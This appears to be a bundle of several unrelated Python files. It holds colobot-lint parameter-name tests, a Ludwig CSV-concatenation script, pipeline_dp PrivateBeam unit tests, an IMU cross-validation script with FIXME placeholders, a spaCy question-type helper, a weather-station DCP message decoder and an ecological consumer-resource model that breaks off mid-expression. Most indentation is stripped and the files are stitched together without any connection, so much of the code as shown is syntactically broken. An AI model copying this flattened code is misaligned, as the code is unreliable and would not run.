expected_errors = [])
def test_function_declaration_and_function_definition_with_empty_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);',
'void Foo(int, int, int) {}'
],
expected_errors = [])
def test_function_declaration_and_function_definition_with_inconsistent_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);',
'void Foo(int x, int y, int z) {}'
],
expected_errors = [
{
'msg': "Function 'Foo' has other declaration(s) with inconsistently named parameter(s)",
'line': '1'
}
])
def test_multiple_function_declarations_and_function_definition_with_inconsistent_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'void Foo(int a, int b, int c);',
'void Foo(int d, int e, int f);',
'void Foo(int x, int y, int z) {}'
],
expected_errors = [
{
'msg': "Function 'Foo' has other declaration(s) with inconsistently named parameter(s)",
'line': '1'
}
])
def test_class_method_declaration_and_definition(self):
self.assert_colobot_lint_result(
source_file_lines = [
'struct Foo',
'{',
' void Bar(int a, int b, int c);',
                '};',
                'void Foo::Bar(int a, int b, int c) {}',
],
expected_errors = [])
def test_class_method_declaration_and_definition_inconsistent_parameter_names(self):
self.assert_colobot_lint_result(
source_file_lines = [
'struct Foo',
'{',
' void Bar(int a, int b, int c);',
                '};',
                'void Foo::Bar(int x, int y, int z) {}',
],
expected_errors = [
{
'msg': "Function 'Foo::Bar' has other declaration(s) with inconsistently named parameter(s)",
'line': '3'
}
])
|
#! /usr/bin/env python
# coding=utf-8
# Copyright (c) 2019 Uber Technologies, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import argparse
import logging
import numpy as np
from ludwig.backend import LOCAL_BACKEND
from ludwig.constants import SPLIT
from ludwig.utils.data_utils import read_csv
logger = logging.getLogger(__name__)
def concatenate_csv(train_csv, vali_csv, test_csv, output_csv):
concatenated_df = concatenate_files(
train_csv, vali_csv, test_csv, read_csv, LOCAL_BACKEND
)
logger.info('Saving concatenated dataset as csv..')
concatenated_df.to_csv(output_csv, encoding='utf-8', index=False)
logger.info('done')
def concatenate_files(train_fname, vali_fname, test_fname, read_fn, backend):
df_lib = backend.df_engine.df_lib
logger.info('Loading training file...')
train_df = read_fn(train_fname, df_lib)
logger.info('done')
logger.info('Loading validation file..')
vali_df = read_fn(vali_fname, df_lib) if vali_fname is not None else None
logger.info('done')
logger.info('Loading test file..')
test_df = read_fn(test_fname, df_lib) if test_fname is not None else None
logger.info('done')
logger.info('Concatenating files..')
concatenated_df = concatenate_df(train_df, vali_df, test_df, backend)
logger.info('done')
return concatenated_df
def concatenate_df(train_df, vali_df, test_df, backend):
train_size = len(train_df)
vali_size = len(vali_df) if vali_df is not None else 0
concatenated_df = backend.df_engine.df_lib.concat(
[df for df in [train_df, vali_df, test_df] if df is not None],
ignore_index=True
)
def get_split(idx):
if idx < train_size:
return 0
if idx < train_size + vali_size:
return 1
return 2
concatenated_df[SPLIT] = concatenated_df.index.to_series().map(
get_split
).astype(np.int8)
return concatenated_df
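# Note (added for clarity): the SPLIT column produced above encodes 0 = training rows,
# 1 = validation rows, 2 = test rows. For example, concatenating 3 train, 2 validation
# and 2 test rows yields the split values [0, 0, 0, 1, 1, 2, 2].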
if __name__ == '__main__':
parser = argparse.ArgumentParser(
        description='Concatenate train, validation and test sets into a single CSV'
)
parser.add_argument(
'-train',
'--train_csv',
help='CSV containing the training set'
)
parser.add_argument(
'-vali',
'--vali_csv',
help='CSV containing the validation set'
)
parser.add_argument(
'-test',
'--test_csv',
help='CSV containing the test set'
)
parser.add_argument('-o', '--output_csv', help='output csv')
args = parser.parse_args()
concatenate_csv(args.train_csv, args.vali_csv, args.test_csv, args.output_csv)
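# Example invocation (the script name is hypothetical; the flags are defined above):
#   python concatenate_csv.py --train_csv train.csv --vali_csv validation.csv \
#       --test_csv test.csv --output_csv concatenated.csv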
|
import unittest
import apache_beam as beam
from apache_beam.runners.portability import fn_api_runner
from apache_beam import pvalue
from unittest.mock import patch
import apache_beam.testing.util as beam_util
import pipeline_dp
from pipeline_dp import private_beam
from pipeline_dp import aggregate_params, budget_accounting
class SimplePrivatePTransform(private_beam.PrivatePTransform):
def expand(self, pcol):
return pcol | "Identity transform" >> beam.Map(lambda x: x)
class PrivateBeamTest(unittest.TestCase):
@staticmethod
def privacy_id_extractor(x):
return f"pid:{x}"
def test_make_private_transform_succeeds(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
# Act
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Assert
self.assertIsInstance(private_collection,
private_beam.PrivatePCollection)
self.assertEqual(private_collection._budget_accountant,
budget_accountant)
def test_private_collection_with_non_private_transform_throws_error(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act and Assert
with self.assertRaises(TypeError) as context:
(private_collection | 'Non private transform on '
'PrivatePCollection' >> beam.Map(lambda x: x))
self.assertIsInstance(private_collection,
private_beam.PrivatePCollection)
self.assertTrue(
"private_transform should be of type "
"PrivatePTransform but is " in str(context.exception))
def test_transform_with_return_anonymized_disabled_returns_private_collection(
self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | SimplePrivatePTransform(
return_anonymized=False)
# Assert
self.assertIsInstance(transformed, private_beam.PrivatePCollection)
def test_transform_with_return_anonymized_enabled_returns_pcollection(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | SimplePrivatePTransform(
return_anonymized=True)
# Assert
self.assertIsInstance(transformed, pvalue.PCollection)
@patch('pipeline_dp.dp_engine.DPEngine.aggregate')
def test_sum_calls_aggregate_with_params(self, mock_aggregate):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
sum_params = aggregate_params.SumParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
max_partitions_contributed=2,
max_contributions_per_partition=3,
low=1,
high=5,
budget_weight=1,
public_partitions=[],
partition_extractor=lambda x: f"pk:{x // 10}",
value_extractor=lambda x: x)
# Act
transformer = private_beam.Sum(sum_params=sum_params)
private_collection | transformer
# Assert
self.assertEqual(transformer._budget_accountant, budget_accountant)
mock_aggregate.assert_called_once()
args = mock_aggregate.call_args[0]
params = pipeline_dp.AggregateParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
metrics=[pipeline_dp.Metrics.SUM],
max_partitions_contributed=sum_params.
max_partitions_contributed,
max_contributions_per_partition=sum_params.
max_contributions_per_partition,
low=sum_params.low,
high=sum_params.high,
public_partitions=sum_params.public_partitions)
self.assertEqual(args[1], params)
@patch('pipeline_dp.dp_engine.DPEngine.aggregate')
def test_count_calls_aggregate_with_params(self, mock_aggregate):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
count_params = aggregate_params.CountParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
max_partitions_contributed=2,
max_contributions_per_partition=3,
budget_weight=1,
public_partitions=[],
partition_extractor=lambda x: f"pk:{x // 10}",
value_extractor=lambda x: x)
# Act
transformer = private_beam.Count(count_params=count_params)
private_collection | transformer
# Assert
self.assertEqual(transformer._budget_accountant, budget_accountant)
mock_aggregate.assert_called_once()
args = mock_aggregate.call_args[0]
params = pipeline_dp.AggregateParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
metrics=[pipeline_dp.Metrics.COUNT],
max_partitions_contributed=count_params.
max_partitions_contributed,
max_contributions_per_partition=count_params.
max_contributions_per_partition,
public_partitions=count_params.public_partitions)
self.assertEqual(args[1], params)
@patch('pipeline_dp.dp_engine.DPEngine.aggregate')
def test_privacy_id_count_calls_aggregate_with_params(self, mock_aggregate):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol = pipeline | 'Create produce' >> beam.Create(
[1, 2, 3, 4, 5, 6])
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
privacy_id_count_params = aggregate_params.PrivacyIdCountParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
max_partitions_contributed=2,
budget_weight=1,
public_partitions=[],
partition_extractor=lambda x: f"pk:{x // 10}",
value_extractor=lambda x: x)
# Act
transformer = private_beam.PrivacyIdCount(
privacy_id_count_params=privacy_id_count_params)
private_collection | transformer
# Assert
self.assertEqual(transformer._budget_accountant, budget_accountant)
mock_aggregate.assert_called_once()
args = mock_aggregate.call_args[0]
params = pipeline_dp.AggregateParams(
noise_kind=pipeline_dp.NoiseKind.GAUSSIAN,
metrics=[pipeline_dp.Metrics.PRIVACY_ID_COUNT],
max_partitions_contributed=privacy_id_count_params.
max_partitions_contributed,
max_contributions_per_partition=1,
public_partitions=privacy_id_count_params.public_partitions)
self.assertEqual(args[1], params)
def test_map_returns_correct_results_and_accountant(self):
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol_input = [(1, 2), (2, 3), (3, 4), (4, 5)]
pcol = pipeline | 'Create produce' >> beam.Create(pcol_input)
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | private_beam.Map(
fn=lambda x: x[1]**2)
# Assert
self.assertIsInstance(transformed, private_beam.PrivatePCollection)
beam_util.assert_that(
transformed._pcol,
beam_util.equal_to(
map(
lambda x:
(PrivateBeamTest.privacy_id_extractor(x), x[1]**2),
pcol_input)))
self.assertEqual(transformed._budget_accountant, budget_accountant)
def test_flatmap_returns_correct_results_and_accountant(self):
def flat_map_fn(x):
return [(x[0], x[1] + i) for i in range(2)]
runner = fn_api_runner.FnApiRunner()
with beam.Pipeline(runner=runner) as pipeline:
# Arrange
pcol_input = [(1, 2), (2, 3), (3, 4)]
pcol = pipeline | 'Create produce' >> beam.Create(pcol_input)
budget_accountant = budget_accounting.NaiveBudgetAccountant(
total_epsilon=1, total_delta=0.01)
private_collection = (
pcol | 'Create private collection' >> private_beam.MakePrivate(
budget_accountant=budget_accountant,
privacy_id_extractor=PrivateBeamTest.privacy_id_extractor))
# Act
transformed = private_collection | private_beam.FlatMap(flat_map_fn)
# Assert
self.assertIsInstance(transformed, private_beam.PrivatePCollection)
beam_util.assert_that(
transformed._pcol,
beam_util.equal_to([('pid:(1, 2)', (1, 2)),
('pid:(1, 2)', (1, 3)),
('pid:(2, 3)', (2, 3)),
('pid:(2, 3)', (2, 4)),
('pid:(3, 4)', (3, 4)),
('pid:(3, 4)', (3, 5))]))
self.assertEqual(transformed._budget_accountant, budget_accountant)
if __name__ == '__main__':
unittest.main()
|
import argparse
import os
import logging
import yaml
import joblib
# import numpy as np
# from matplotlib import pyplot as plt
from mathtools import utils
# from seqtools import fsm
from kinemparse import imu
logger = logging.getLogger(__name__)
def main(
out_dir=None, data_dir=None, scores_dir=None,
model_name=None, model_params={},
results_file=None, sweep_param_name=None,
cv_params={}, viz_params={},
plot_predictions=None):
data_dir = os.path.expanduser(data_dir)
out_dir = os.path.expanduser(out_dir)
logger = utils.setupRootLogger(filename=os.path.join(out_dir, 'log.txt'))
if results_file is None:
results_file = os.path.join(out_dir, f'results.csv')
else:
results_file = os.path.expanduser(results_file)
fig_dir = os.path.join(out_dir, 'figures')
if not os.path.exists(fig_dir):
os.makedirs(fig_dir)
out_data_dir = os.path.join(out_dir, 'data')
if not os.path.exists(out_data_dir):
os.makedirs(out_data_dir)
def loadVariable(var_name):
return joblib.load(os.path.join(data_dir, f'{var_name}.pkl'))
def saveVariable(var, var_name):
joblib.dump(var, os.path.join(out_data_dir, f'{var_name}.pkl'))
# Load data
trial_ids = loadVariable('trial_ids')
feature_seqs = loadVariable('imu_sample_seqs')
label_seqs = loadVariable('imu_label_seqs')
if scores_dir is not None:
scores_dir = os.path.expanduser(scores_dir)
feature_seqs = tuple(
joblib.load(
os.path.join(scores_dir, f'trial={trial_id}_score-seq.pkl')
).swapaxes(0, 1)
for trial_id in trial_ids
)
# Define cross-validation folds
dataset_size = len(trial_ids)
cv_folds = utils.makeDataSplits(dataset_size, **cv_params)
metric_dict = {
'accuracy': [],
'edit_score': [],
'overlap_score': []
}
def getSplit(split_idxs):
split_data = tuple(
tuple(s[i] for i in split_idxs)
for s in (feature_seqs, label_seqs, trial_ids)
)
return split_data
for cv_index, cv_splits in enumerate(cv_folds):
train_data, val_data, test_data = tuple(map(getSplit, cv_splits))
train_ids = train_data[-1]
test_ids = test_data[-1]
val_ids = val_data[-1]
logger.info(
f'CV fold {cv_index + 1}: {len(trial_ids)} total '
f'({len(train_ids)} train, {len(val_ids)} val, {len(test_ids)} test)'
)
for name in metric_dict.keys():
value = None # FIXME
metric_dict[name] += [value]
metric_str = ' '.join(f"{k}: {v[-1]:.1f}%" for k, v in metric_dict.items())
logger.info('[TST] ' + metric_str)
d = {k: v[-1] for k, v in metric_dict.items()}
utils.writeResults(results_file, d, sweep_param_name, model_params)
test_io_history = None # FIXME
if plot_predictions:
imu.plot_prediction_eg(test_io_history, fig_dir, **viz_params)
def saveTrialData(pred_seq, score_seq, feat_seq, label_seq, trial_id):
saveVariable(pred_seq, f'trial={trial_id}_pred-label-seq')
saveVariable(score_seq, f'trial={trial_id}_score-seq')
saveVariable(label_seq, f'trial={trial_id}_true-label-seq')
for io in test_io_history:
saveTrialData(*io)
# saveVariable(train_ids, f'cvfold={cv_index}_train-ids')
# saveVariable(test_ids, f'cvfold={cv_index}_test-ids')
# saveVariable(val_ids, f'cvfold={cv_index}_val-ids')
# saveVariable(metric_dict, f'cvfold={cv_index}_{model_name}-metric-dict')
# saveVariable(model, f'cvfold={cv_index}_{model_name}-best')
if __name__ == "__main__":
# Parse command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--config_file')
parser.add_argument('--out_dir')
parser.add_argument('--data_dir')
parser.add_argument('--scores_dir')
parser.add_argument('--model_params')
parser.add_argument('--results_file')
parser.add_argument('--sweep_param_name')
args = vars(parser.parse_args())
args = {k: v for k, v in args.items() if v is not None}
# Load config file and override with any provided command line args
    config_file_path = args.pop('config_file', None)
    if config_file_path is None:
        file_basename = utils.stripExtension(__file__)
        config_fn = f"{file_basename}.yaml"
        config_file_path = os.path.join(
            os.path.expanduser('~'), 'repo', 'kinemparse', 'scripts', config_fn
        )
    else:
        # Keep the provided config file's name so it can be re-written to out_dir below.
        config_fn = os.path.basename(config_file_path)
with open(config_file_path, 'rt') as config_file:
config = yaml.safe_load(config_file)
for k, v in args.items():
if isinstance(v, dict) and k in config:
config[k].update(v)
else:
config[k] = v
# Create output directory, instantiate log file and write config options
out_dir = os.path.expanduser(config['out_dir'])
if not os.path.exists(out_dir):
os.makedirs(out_dir)
with open(os.path.join(out_dir, config_fn), 'w') as outfile:
yaml.dump(config, outfile)
utils.copyFile(__file__, out_dir)
utils.autoreload_ipython()
main(**config)
|
# import os
import spacy
# from spacy.attrs import IS_STOP, IS_PUNCT, IS_SPACE, IS_OOV
# from .dataset import dataset
# from .IdentifyRessource import extract_entities
# import re
# #==========================================Initialisation==================================
nlp = spacy.load('en_core_web_sm')
# rawtext=''
# PredicatList=dataset().get_Predicates()
# # Create a list of WH questions
whquestion = ["where","when", "who"]
whenquestion =['time','date','year','month','day','hour','minute','seconds']
wherequestion=['place','location','city','country','state','town']
who='PERSON'
# #========================================FUNCTIONS============================
# def get_typed_quest(inputText):
# rawtext=inputText
# #def get_fetched_ressource
def get_Expected_Answer_type(rawtext):
    doc = nlp(rawtext)
    for token in doc:
        # Match against the lowercase WH-word list defined above (case-sensitive).
        if token.text in whquestion:
            return token.text
    return None
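# Usage sketch (hypothetical question text): get_Expected_Answer_type("where was the treaty signed")
# returns "where". The match is case-sensitive, so capitalised WH-words are not detected.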
# def remove_stpwords_from_query(rawtext):
# doc=nlp(u""+rawtext)
# stopwords=open("stopwords.txt","w")
# for token in doc:
# if token.check_flag(IS_STOP):
# stopwords.write(token.text+"\n")
# string = r"\b{} \b".format(token.text) # it also replaces the space
# rawtext=re.sub(string ,"" ,rawtext)
# #print(rawtext)
# return rawtext.split()
# def remove_NE_from_filquest(rawtext,NamedEntityList):
# for Entity in NamedEntityList:
# if (rawtext.find(Entity)):
# rawtext=rawtext.replace(Entity,'')
# #print(rawtext)
# return rawtext
# #def exact_match(Candidate):
# #print(Candidate)
# # for key in PredicatList.keys():
# # # for c in Candidate:
# # # if c==key:
# # # print("found")
# # # else:
# # # print("not found")
# # def check_semantic_similarity(Candidate):
# # def exact_substring_match(Candidate):
# #def get_relation_identification():
|
import logging
from datetime import datetime, timedelta
import pytz
from django.db import IntegrityError
from wx.decoders.insert_raw_data import insert
from wx.models import VariableFormat, DcpMessages
tz_utc = pytz.timezone("UTC")
tz_bz = pytz.timezone("Etc/GMT+6")
ELEMENTS = {
"BATTERY": 200,
"RAINFALL": 0,
"TEMP_MAX": 16,
"TEMP_MIN": 14,
"RH": 30,
"WIND_SPEED": 50,
"WIND_DIR": 55,
"WIND_GUST": 53,
"SOLAR_RADIATION": 72,
"PRESSURE": 60
}
def parse_float(value):
try:
return float(value)
except ValueError:
return None
'''
def parse_header(header):
dcp_code = header[:8]
date = datetime.strptime(header[8:19], '%y%j%H%M%S')
failure_code = header[19:20]
signal_strength = header[20:22]
frequency_offset = header[22:24]
modulation_index = header[24:25]
data_quality = header[25:26]
channel = header[26:29]
spacecraft = header[29:30]
print()
print('dcp_code: ' + dcp_code)
print('date: ' + str(date))
print('failure_code: ' + failure_code)
print('signal_strength: ' + signal_strength)
print('frequency_offset: ' + frequency_offset)
print('modulation_index: ' + modulation_index)
print('data_quality: ' + data_quality)
print('channel: ' + channel)
print('spacecraft: ' + spacecraft)
print()
'''
def parse_line(station_id, header_date, line, interval_lookup_table, records):
fields = line.split(" ")
line_hour = int(fields[0][0:2])
line_minute = int(fields[0][2:4])
line_date = datetime(header_date.year, header_date.month, header_date.day, line_hour, line_minute)
# if hour of measurement is bigger than the transmission hour it is from the previous day
if line_hour > header_date.hour:
line_date = line_date - timedelta(days=1)
line_date = tz_utc.localize(line_date)
# line_date = line_date.astimezone(tz_bz)
values = [parse_float(f) for f in fields[1:]]
for idx, (k, v) in enumerate(list(zip(list(ELEMENTS.values())[:len(values)], values)), 1):
if v is not None:
columns = [
station_id, # station
k, # element
interval_lookup_table[str(idx)], # interval seconds
line_date, # datetime
v, # value
None, # "quality_flag"
None, # "qc_range_quality_flag"
None, # "qc_range_description"
None, # "qc_step_quality_flag"
None, # "qc_step_description"
None, # "qc_persist_quality_flag"
None, # "qc_persist_description"
None, # "manual_flag"
None, # "consisted"
False # "is_daily"
]
records.append(columns)
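# Illustration (hypothetical values, not a real transmission): a line such as
#   "0730 12.7 0.0 31.2 22.4 85 3.4 180 6.1 450 1012"
# is parsed as a 07:30 UTC measurement whose values are matched positionally against
# ELEMENTS (battery, rainfall, max/min temperature, RH, wind speed/direction/gust,
# solar radiation, pressure).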
def read_data(station_id, dcp_address, response, err_message):
print(f'Inside NESA decoder - read_data(station_id={station_id}, dcp_address={dcp_address})')
transmissions = response.split(dcp_address)
records = []
dcp_format = 6
interval_lookup_table = {
lookup_key: seconds for (lookup_key, seconds) in VariableFormat.objects.filter(
format_id=dcp_format
).values_list('lookup_key', 'interval__seconds')
}
for transmission in transmissions[1:]:
header, *lines = transmission.split(" \r\n")
        # Some transmissions cannot be decoded (e.g. a missing transmission slot), so skip
        # error messages and log them instead of failing the whole batch.
try:
header_date = datetime.strptime(header[:11], '%y%j%H%M%S')
dcp_message = DcpMessages.create(f"{dcp_address}{header}", "\n".join(lines))
try:
dcp_message.save()
except IntegrityError:
logging.info(f"dcp_message already saved in the database: {header}")
for line in lines:
parse_line(station_id, header_date, line, interval_lookup_table, records)
except Exception as ex:
_lines = "\n".join(lines)
logging.error(f"NESA/CDP Message: Error on decode message for station_id={station_id} "
f"dcp_address={dcp_address}\nheader={header}\n"
f"lines={_lines}\n{ex}")
if records:
print('Inside NESA decoder - {0} records downloaded.'.format(len(records)))
insert(records)
else:
print('NESA DECODER - NO DATA FOUND - ' + err_message.decode('ascii'))
|
# Community III
# Two stage-structured consumer species feeding on two resources
# For units and references, see Table S1.2 in Appendix S1
# Created by Wojciech Uszko (2021)
import numpy as np
from scipy.integrate import odeint
import matplotlib.pyplot as plt
# Body masses (ng dry weight):
B_JS = 100 # small juvenile
B_AS = 1000 # small adult
B_JL = 1000 # large juvenile
B_AL = 10000 # large adult
# Temperature- or body mass-independent parameters:
deltaRS = 0.1 # small resource supply rate
deltaRL = 0.1 # large resource supply rate
q = 0 # functional response (Hill) exponent; if =0 then type II
p = 0.75 # diet preference
pASRS = p
pASRL = 1-pASRS
pJLRL = pASRS
pJLRS = 1-pASRS
betaJS = 0.6 # small juvenile conversion efficiency
betaAS = 0.6 # small adult conversion efficiency
betaJL = 0.6 # large juvenile conversion efficiency
betaAL = 0.6 # large adult conversion efficiency
HJSRS = 0.2 # half-saturation constant
HASRS = 0.2 # half-saturation constant
HASRL = 0.2 # half-saturation constant
HJLRS = 0.2 # half-saturation constant
HJLRL = 0.2 # half-saturation constant
HALRL = 0.2 # half-saturation constant
zJSAS = 0.1 # small juvenile-to-adult mass ratio
zJLAL = 0.1 # large juvenile-to-adult mass ratio
muJS = 0.01 # small juvenile background mortality rate
muAS = 0.01 # small adult background mortality rate
muJL = 0.01 # large juvenile background mortality rate
muAL = 0.01 # large adult background mortality rate
# Ambient temperature (Kelvin):
T = 273.15 + 20
"""
# Temperature- or body mass-dependent parameters
# Without size-temperature interaction:
# Resource supply density:
RSmax = 0.0042 * np.exp( 0.151/(0.00008617*T) )
RLmax = RSmax
# Consumer maximum ingestion rate:
IJSRSmax = (19 * (B_JS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JS
IASRSmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IASRLmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IJLRSmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IJLRLmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IALRLmax = (19 * (B_AL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AL
# Consumer metabolic rate:
mJS = (850000000 * (B_JS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JS
mAS = (850000000 * (B_AS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AS
mJL = (850000000 * (B_JL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JL
mAL = (850000000 * (B_AL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AL
"""
# Temperature- or body mass-dependent parameters
# With size-temperature interaction in Rmax and in temperature optimum of Imax:
# Resource supply density:
RSmax = 0.0042 * np.exp( 0.151/(0.00008617*T) )
RLmax = (5.88* 10**(-7)) * np.exp( 0.37564/(0.00008617*T) )
# Consumer maximum ingestion rate:
IJSRSmax = (19 * (B_JS**(0.7)) * np.exp(-((T-(273.15+24))**2)/(2*(8**2)))) / B_JS
IASRSmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IASRLmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IJLRSmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IJLRLmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IALRLmax = (19 * (B_AL**(0.7)) * np.exp(-((T-(273.15+16))**2)/(2*(8**2)))) / B_AL
# Consumer metabolic rate:
mJS = (850000000 * (B_JS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JS
mAS = (850000000 * (B_AS**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AS
mJL = (850000000 * (B_JL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_JL
mAL = (850000000 * (B_AL**0.7) * np.exp( -0.56/(0.00008617*T) )) / B_AL
"""
# Temperature- or body mass-dependent parameters
# With size-temperature interaction in Rmax and in metabolic rate:
# Resource supply density:
RSmax = 0.0042 * np.exp( 0.151/(0.00008617*T) )
RLmax = (5.88* 10**(-7)) * np.exp( 0.37564/(0.00008617*T) )
# Consumer maximum ingestion rate:
IJSRSmax = (19 * (B_JS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JS
IASRSmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IASRLmax = (19 * (B_AS**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AS
IJLRSmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IJLRLmax = (19 * (B_JL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_JL
IALRLmax = (19 * (B_AL**(0.7)) * np.exp(-((T-(273.15+20))**2)/(2*(8**2)))) / B_AL
# Consumer metabolic rate:
mJS = (850000000 * (B_JS**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_JS
mAS = (850000000 * (B_AS**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_AS
mJL = (850000000 * (B_JL**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_JL
mAL = (850000000 * (B_AL**(0.7 + 0.0005*T)) * np.exp( -0.56/(0.00008617*T) )) / B_AL
"""
# Specify the model:
def model(X,t):
# Variables:
RS = X[0] # small resource biomass density
RL = X[1] # large resource biomass density
JS = X[2] # small juvenile biomass density
AS = X[3] # small adult biomass density
JL = X[4] # large juvenile biomass density
AL = X[5] # large adult biomass density
# Ingestion rates:
IJSRS = ( ( 1 * (IJSRSmax/(HJSRS**(1+q))) * RS**(1+q) ) /
( 1 + (1/(HJSRS**(1+q))) * RS**(1+q) ) )
IASRS = ( ( pASRS * (IASRSmax/(HASRS**(1+q))) * RS**(1+q) + 0 * (IASRLmax/(HASRL**(1+q))) * RL**(1+q) ) /
( 1 + (pASRS/(HASRS**(1+q))) * RS**(1+q) + (pASRL/(HASRL**(1+q))) * RL**(1+q) ) )
IASRL = ( ( 0 * (IASRSmax/(HASRS**(1+q))) * RS**(1+q) + pASRL * (IASRLmax/(HASRL**(1+q))) * RL**(1+q) ) /
( 1 + (pASRS/(HASRS**(1+q))) * RS**(1+q) + (pASRL/(HASRL**(1+q))) * RL**(1+q) ) )
IJLRS = ( ( pJLRS * (IJLRSmax/(HJLRS**(1+q))) * RS**(1+q) + 0 * (IJLRLmax/(HJLRL**(1+q))) * RL**(1+q) ) /
